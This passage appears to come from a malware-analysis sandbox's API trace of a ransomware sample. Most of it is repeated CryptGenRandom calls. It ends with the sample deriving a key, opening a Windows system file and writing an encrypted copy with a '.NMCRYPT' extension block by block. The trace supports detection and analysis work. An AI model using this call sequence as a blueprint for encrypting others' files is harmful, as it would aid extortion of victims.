hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.724] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.725] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.727] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.727] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.728] CryptCreateHash (in: hProv=0x8e3990, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0160.728] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.728] CryptDeriveKey (in: hProv=0x8e3990, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad4b8) returned 1 [0160.728] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0160.728] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0160.728] wcslen (_String="\\\\?\\") returned 0x4 [0160.728] CryptDuplicateKey (in: hKey=0x9ad4b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad5b8) returned 1 [0160.728] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0160.729] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0160.729] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0160.729] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0160.729] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.730] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.730] GetLastError () returned 0x0 [0160.730] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.731] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.732] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.732] GetLastError () returned 0x0 [0160.732] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.732] ReadFile 